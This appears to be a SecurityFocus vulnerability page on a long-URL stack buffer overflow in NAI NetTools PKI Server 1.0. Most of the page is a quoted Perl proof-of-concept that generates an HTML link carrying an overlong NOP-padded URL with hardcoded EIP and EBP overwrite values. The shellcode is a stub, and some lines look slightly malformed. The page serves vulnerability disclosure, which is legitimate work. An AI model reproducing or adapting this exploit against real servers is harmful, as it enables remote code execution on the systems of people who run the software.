NAI Net Tools PKI Server strong.exe Buffer Overflow Vulnerability

As detailed in the CORE SDI advisory on this issue:

# NAI NetTools PKI SERVER 1.0 - Long URL Stack Overflow Exploit
# Replace host and port an create the html file:
#./ > test.html
#Open the html in a SSL compatible browser and click on the link. puf!
#Juliano Rizzo (c) 2000

$host = "localhost";
$port = "444";
$shell_code= "\x90\x90\x90\x90";

#We can set the values of EIP and EBP, our code is on the stack
#and in 0x01613A2E.
$eip = "\x2E\x3A\x61\x01";#0x01613A2E (URL readed from socket)
#$eip = "\x64\x83\x40%00";#0x00408364 (CALL EBP)
$ebp = "\xCB\xF2\01\x02"; #0x0200F2CB (trunca el string por el 00)
$noplen = (2965 - length($shell_code));
print "<html><body><a href=\"https://".$host.":".$port."/";
print "\x90"x$noplen;
"\">Click here to exploit.!</a></body></html>";

note: wrapped for readability


Privacy Statement
Copyright 2010, SecurityFocus